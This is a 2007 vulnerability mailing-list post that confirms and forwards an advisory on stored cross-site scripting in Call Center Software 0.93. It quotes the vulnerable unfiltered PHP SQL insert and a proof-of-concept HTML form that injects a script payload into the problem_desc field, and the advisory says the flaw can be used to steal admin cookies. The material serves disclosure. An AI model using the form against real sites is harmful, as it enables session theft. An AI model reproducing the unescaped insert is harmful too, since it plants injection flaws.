[VIM] [TRUE] Call Center Software - Remote Xss Post Exploit -

Noam Rathaus noamr at beyondsecurity.com
Thu Feb 22 05:55:58 EST 2007


Looks real (code):
 $problem_desc = $_POST['problem_desc'];

        if(strlen($name) > 0 && strlen($problem_desc) > 0){
            $sql = "insert into calls (call_date, name, phone, department_id, 
issue_id, problem_desc) values ";
$sql .= "('$today', '$name', '$phone', '$department_id', '$issue_id', '$problem_desc')";

Meaning that problem_desc is inserted without any kind of filtering, and read 
without any kind of filtering.

----------  Forwarded Message  ----------

Subject: Call Center Software - Remote Xss Post Exploit -
Date: Wednesday 21 February 2007 21:23
From: corrado.liotta at alice.it
To: bugtraq at securityfocus.com


                       Call center 0,93

  Author: CorryL    [corryl80 at gmail.com]

-=[+] Application:    Call senter
-=[+] Version:        0,93
-=[+] Vendor's URL:   http://www.call-center-software.org/
-=[+] Platform:       Windows\Linux\Unix
-=[+] Bug type:       Cross-Site Script
-=[+] Exploitation:   Remote
-=[+] Author:           CorryL  ~ corryl80[at]gmail[dot]com ~
-=[+] Reference:       www.xoned.net
-=[+] Virtual Office:  http://www.kasamba.com/CorryL
-=[+] Irc Chan:         irc.darksin.net #x0n3-h4ck

..::[ Descriprion ]::..

Call center software is one of the most important aspects of any call help
 center, being able to track and manage calls can be the key to high customer
 safisfacation. Our 100% free call center software solution is based on php
 and the mysql database.

..::[ Bug ]::..

An attacker exploiting this vulnerability is able steal the content
the cookies of the consumer admin in fact the bug situated is on an request
 post then he remains memorized inside the database in attends him that the
 admin goes to read the content of the call


<title>Call Center</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel="stylesheet" href="helpdesk.css" type="text/css">

<table bgcolor="#FFFFFF" width="100%">
		<td align="center">
			<form method="post" action="http://remote_server/path/call_entry.php">
			<table border="0">
					<th class="ttitle">Adding Call</th>
						<table width="100%" border="0" cellspacing="0" cellpadding="3">
								<td align="right">Name:&nbsp;</td><td align="left"><input type="text"
 name="name" Value="H4ck3r"size="30"></td> </tr>
								<td align="right">Phone:&nbsp;</td><td align="left"><input
 type="text" name="phone" value="111-555-555" size="20"></td> </tr>
								<td align="right">Department:&nbsp;</td>
									<select name="department_id">
                   <option value="1">Problem</option> </select>
								<td align="right">Issue Type:&nbsp;</td>
									<select name="issue_id">
																	<option value="6">email</option>
																	<option value="2">keyboard</option>
																	<option value="3">monitor</option>
																	<option value="5">mouse</option>
																	<option value="4">network</option>
																	<option value="8">password</option>
																	<option value="7">word processing</option>
								<td align="right" valign="top">Xss Script Here :&nbsp;</td>
								<td align="left"><input type="text" name="problem_desc" value="<body
 onload=alert(1395499912)>" size="50"></td> </tr>
								<td>&nbsp;</td><td><input type="submit" name="submit" value="Add"
 class="button"></td> </tr>


  Noam Rathaus
  1616 Anderson Rd.
  McLean, VA 22102
  Tel: 703.286.7725 extension 105
  Fax: 888.667.7740
  noamr at beyondsecurity.com

More information about the VIM mailing list